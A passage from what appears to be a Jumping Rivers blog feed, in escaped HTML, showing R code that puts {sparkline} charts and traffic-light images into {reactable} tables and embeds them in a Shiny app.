&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="230" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/table1.html" alt="reactable table displaying sparkline boxplots and line &amp;amp; bar charts" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;h2 id="using-sparklines-in-a-shiny-app"&gt;Using sparklines in a Shiny App&lt;/h2&gt;
&lt;p&gt;This is made very easy by two {reactable} functions which
follow the usual &lt;a href="https://shiny.posit.co/" rel="external"&gt;Shiny&lt;/a&gt; naming convention. In the
server we’ll use &lt;code&gt;renderReactable&lt;/code&gt; (which uses
&lt;code&gt;htmlwidgets::shinyRenderWidget&lt;/code&gt; under the hood) to create our table.
Then in the UI we’ll use &lt;code&gt;reactableOutput&lt;/code&gt; (which uses
&lt;code&gt;htmlwidgets::shinyWidgetOutput&lt;/code&gt;) to display the table in the app.&lt;/p&gt;
&lt;p&gt;To demonstrate this, here is a basic Shiny app with a sparkline bullet
chart in a reactable table, followed by a screenshot of the result.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Server&lt;/span&gt;
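&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(shiny)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(reactable)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sparkline)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)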
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;sparkline_table &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderReactable&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; iris &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lower_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)[1],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; upper_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)[2],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bullet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; iris_table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; defaultColDef &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Sepal.Length &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bullet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mean[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;upper_range[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;lower_range[[index]]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bullet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;titlePanel&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Sparkline!&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarLayout&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebarPanel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarPanel&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sliderInput&lt;/span&gt;(inputId &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;rows&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of rows:&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mainPanel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mainPanel&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactableOutput&lt;/span&gt;(outputId &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sparkline_table&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/images/app.png" alt="Shiny app with sparkline reactable table." &gt;&lt;/img&gt;&lt;/p&gt;
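&lt;p&gt;The server and UI above can be combined into a running app with &lt;code&gt;shinyApp()&lt;/code&gt;. The sketch below is a stripped-down version: it leaves out the sparkline column and, as an assumption about the intent of the slider, uses &lt;code&gt;input$rows&lt;/code&gt; to limit how many rows of &lt;code&gt;iris&lt;/code&gt; are shown.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(shiny)
library(reactable)

ui = fluidPage(
  sliderInput(inputId = &amp;#34;rows&amp;#34;, label = &amp;#34;Number of rows:&amp;#34;,
              min = 1, max = 50, value = 30),
  reactableOutput(outputId = &amp;#34;sparkline_table&amp;#34;)
)

server = function(input, output) {
  output$sparkline_table = renderReactable({
    # input$rows is reactive, so the table re-renders when the slider moves
    # (assumed behaviour: the slider limits the number of rows displayed)
    reactable(head(iris, input$rows))
  })
}

# Build the app object; print `app` or call runApp(app) to launch it
app = shinyApp(ui = ui, server = server)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;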
&lt;h2 id="dynamic-image-in-a-reactable-table"&gt;Dynamic Image in a Reactable Table&lt;/h2&gt;
&lt;p&gt;Another thing that you can do with {reactable} is create dynamic image columns.
To show this, I’ve created a traffic light visualisation with 3 levels:&lt;/p&gt;
&lt;p&gt;Level 1 (Green):
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/images/1.svg" alt="Level 1 (Green) traffic light." style="height:30px" &gt;&lt;/img&gt;&lt;/p&gt;
&lt;p&gt;Level 2 (Amber):
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/images/2.svg" alt="Level 2 (Amber) traffic light." style="height:30px" &gt;&lt;/img&gt;&lt;/p&gt;
&lt;p&gt;Level 3 (Red):
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/images/3.svg" alt="Level 3 (Red) traffic light." style="height:30px" &gt;&lt;/img&gt;&lt;/p&gt;
&lt;p&gt;For this example I’m only going to include the code required to create
the {reactable} table, but the steps above will work for a
Shiny app as well, provided that the images are available to the app at
the path you pass to the table.&lt;/p&gt;
&lt;p&gt;The key here is to pass a function as the &lt;code&gt;cell&lt;/code&gt; argument of the
reactable column definition. This function takes the cell value and creates an HTML image tag
with the path to the correct SVG file (PNG and JPEG files work the same way).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tibble)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(htmltools)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(reactable)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; `Traffic Light` &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/blog/sparkline-reactable-shiny/images/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; defaultColDef &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(align &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;center&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(`Traffic Light` &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(path, value, &lt;span style="color:#a5d6ff"&gt;&amp;#34;.svg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;img&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; src, style &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;height: 40px;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tagList&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; style &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;display: inline-block; width: 60px&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe width="100%" height="300" src="https://www.jumpingrivers.com/misc/shiny-reactable/html_files/table.html" alt="reactable table displaying traffic light visualisation" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;In this blog we have looked at embedding sparkline reactable tables into
a shiny app and using another type of dynamic image inside a reactable
table. This brings me to the end of the series on {sparkline}, with a
notable cameo from {reactable} and a bit of {shiny} too. Stay tuned for
similar data science blogs.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sparklines in Reactable Tables</title><link>https://www.jumpingrivers.com/blog/sparkline-reactable/</link><pubDate>Thu, 13 Mar 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sparkline-reactable/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sparkline-reactable/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the second blog in a series about the {sparkline} R package for
inline data visualisations. You can read the first one
&lt;a href="https://www.jumpingrivers.com/blog/sparkline/" rel="external"&gt;here&lt;/a&gt;. In this post I
will be demonstrating how you can include sparklines inside HTML tables.&lt;/p&gt;
&lt;h2 id="reactable"&gt;Reactable&lt;/h2&gt;
&lt;p&gt;{reactable} is an R package for producing HTML tables, commonly used in
Shiny.&lt;/p&gt;
&lt;p&gt;To create an HTML &lt;a href="https://glin.github.io/reactable/" rel="external"&gt;reactable&lt;/a&gt; table,
all we need to do is pass a data.frame object to the &lt;code&gt;reactable&lt;/code&gt;
function. These tables have a clean default look, but we can
also add our own styles very easily. In our first example I
am just using the built-in R &lt;code&gt;iris&lt;/code&gt; dataset.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(reactable)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(iris)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="510" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/reactable-table.html" alt="reactable table displaying iris data" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;A few things that can be easily added to reactable tables are filters,
sortable columns, a global search box, a default page size, borders,
striped rows and text wrapping. Along with these arguments we can of course
implement our own styling with CSS.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; iris,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; striped &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, searchable &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filterable &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, bordered &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; defaultPageSize &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="510" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/reactable-styled-table.html" alt="styled reactable table displaying iris data" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;h2 id="sparklines-in-reactable-tables"&gt;Sparklines in Reactable Tables&lt;/h2&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-reactable-sparkline"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="box-line-and-bar-charts"&gt;Box, Line and Bar Charts&lt;/h3&gt;
&lt;p&gt;When it comes to embedding sparklines in reactable tables we need to add
a new column to our table, which we will then overwrite in the &lt;code&gt;columns&lt;/code&gt;
argument of &lt;code&gt;reactable&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In the first example I am using a mock dataset with 3 observations, ‘x’,
‘y’ and ‘z’. Each one is just a list element containing 10 values generated by
&lt;code&gt;rnorm&lt;/code&gt;. Then I am using dplyr’s &lt;code&gt;mutate&lt;/code&gt; function to add three placeholder
